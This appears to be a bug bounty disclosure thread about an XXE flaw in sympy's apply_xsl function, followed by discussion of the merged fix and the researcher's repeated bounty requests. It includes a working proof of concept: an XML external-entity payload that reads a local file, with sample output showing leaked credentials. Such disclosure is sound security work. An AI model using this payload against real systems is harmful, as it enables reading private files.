XML External Entity (XXE) injection in sympy in sympy/sympy
Reported on
Mar 29th 2023
Description
Sympy is an open source platform that a computer algebra system written in pure Python . Sympy is vulnerable to an XML External Entity (XXE) injection in the apply_xsl() functionality of Sympy due to the usage of etree.XML.
Proof of Concept
// PoC.py
from sympy.utilities.mathml import apply_xsl
xsl = 'mathml/data/simple_mmlctop.xsl'
mml = '''
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///d:/test/sensitive.txt"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
'''
res = apply_xsl(mml,xsl)
print(res)
OUTPUT:
<?xml version="1.0"?>
<userInfo>
<firstName>John</firstName>
<lastName>
SENSITIVE INFORMATION.
USERNAME: TEST
PASSWORD: TEST
</lastName>
</userInfo>
Impact
As this vulnerable to XXE, which may lead to Arbitrary File Read, DoS, SSRF.
Occurrences
@maintainer Please use the above patch to mitigate this vulnerability. Thanks.
SECURITY.md
2 months ago
SECURITY.md for
sympy
to merge.
2 months ago
@admin Can u please check the comments in https://github.com/sympy/sympy/pull/24997. And send this report to appropriate people. Thanks.
Can you please explain the attack vector here? If you use Python, you can just open the file d:/test/sensitive.txt directly using open("d:/test/sensitive.txt").
A PR has been merged to fix this: https://github.com/sympy/sympy/pull/25007
Also another PR for the imminent 1.12 release: https://github.com/sympy/sympy/pull/25010
Can you confirm if that fixes the issue?
Hi @maintainer, tested on the latest code base, and I can confirm that the issue is resolved.
Can you please validate this issue, confirm the fix and assign a CVE? Thanks.
Hi @maintainer, 1.12 version is released with fix, can you please Mark this as VALID and add the patch!
https://github.com/sympy/sympy/commit/2c3de5f49f294b7f84b3d58fe15e90b49b9316dc
Hi @admin / @psmoros, I saw a comment in sympy which says
Hi team! To shed some light on what we do; a company that depends on SymPy is sponsoring security research into your project: up to $1040 per valid vulnerability for the researcher and $260 for the maintainer.
https://github.com/sympy/sympy/pull/24997#issuecomment-1493015185
Can you please allocate the bounty as per the comments? Thanks.
Hi @admin, can you please help the maintainer to solve the issue like how to add the patch in comment?
Hi @admin,
Just a reminder to adjust the disclosure bounty up to $1040 per valid vulnerability.
And help the maintainer to add patches. Thanks.
Hey ready-research, I've reached out to @psmoros to get more information on this:)
Is there anything I should be doing here? The issue is fixed now and the fix is released.
Yes, please mark it as fixed and publish it using the green button above the comment section "Mark as fixed"
@psmoros @admin, can you please also look into the issue with the disclosure bounty? Thanks.
Hi @admin, can you please also look into the issue with the bounty?
@psmoros @Pavlos @benharvie @adam-nygate
Hi @psmoros, https://github.com/sympy/sympy/pull/24997#issuecomment-1493015185 As per the comments disclosure bounty up to $1040 per valid vulnerability, but here we have only $75. Can you please adjust the bounty to $1040?